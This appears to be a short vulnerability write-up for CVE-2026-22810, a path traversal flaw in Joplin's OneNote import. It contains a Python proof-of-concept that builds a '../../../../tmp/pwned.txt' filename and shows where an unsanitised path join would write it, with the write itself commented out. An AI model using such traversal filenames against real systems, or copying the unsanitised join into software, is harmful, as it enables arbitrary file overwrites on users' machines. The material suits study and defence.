CVE-2026-22810 Joplin路径遍历漏洞

# PoC Concept for CVE-2026-22810 # This script demonstrates the concept of the vulnerability. # Actual exploitation requires crafting a valid binary .one file structure. import os import zipfile # Simulated malicious payload structure # In a real scenario, this would be embedded within a .one file malicious_filename = "../../../../tmp/pwned.txt" content = b"This file was written via path traversal." print(f"[+] Creating malicious file structure with filename: {malicious_filename}") # Note: Joplin parses .one files specifically. This demonstrates the path logic. # The vulnerability occurs when the OneNote renderer calls fs.write with the unsanitized filename. def simulate_vulnerable_write(base_path, filename, data): """ Simulates the vulnerable behavior in Joplin's embedded_file.rs where filename is not sanitized against path traversal. """ # Vulnerable: Direct concatenation without normalization or validation full_path = os.path.join(base_path, filename) # Normalizing the path to see where it actually points (OS handles this) real_path = os.path.realpath(full_path) print(f"[+] Attempting to write to: {real_path}") # In the actual vulnerability, the file would be written here # with open(real_path, 'wb') as f: # f.write(data) return real_path # Demonstration if __name__ == "__main__": target_dir = "/home/user/joplin_data/imports" print(f"[+] Target base directory: {target_dir}") result_path = simulate_vulnerable_write(target_dir, malicious_filename, content) print(f"[!] Vulnerability could write to: {result_path}")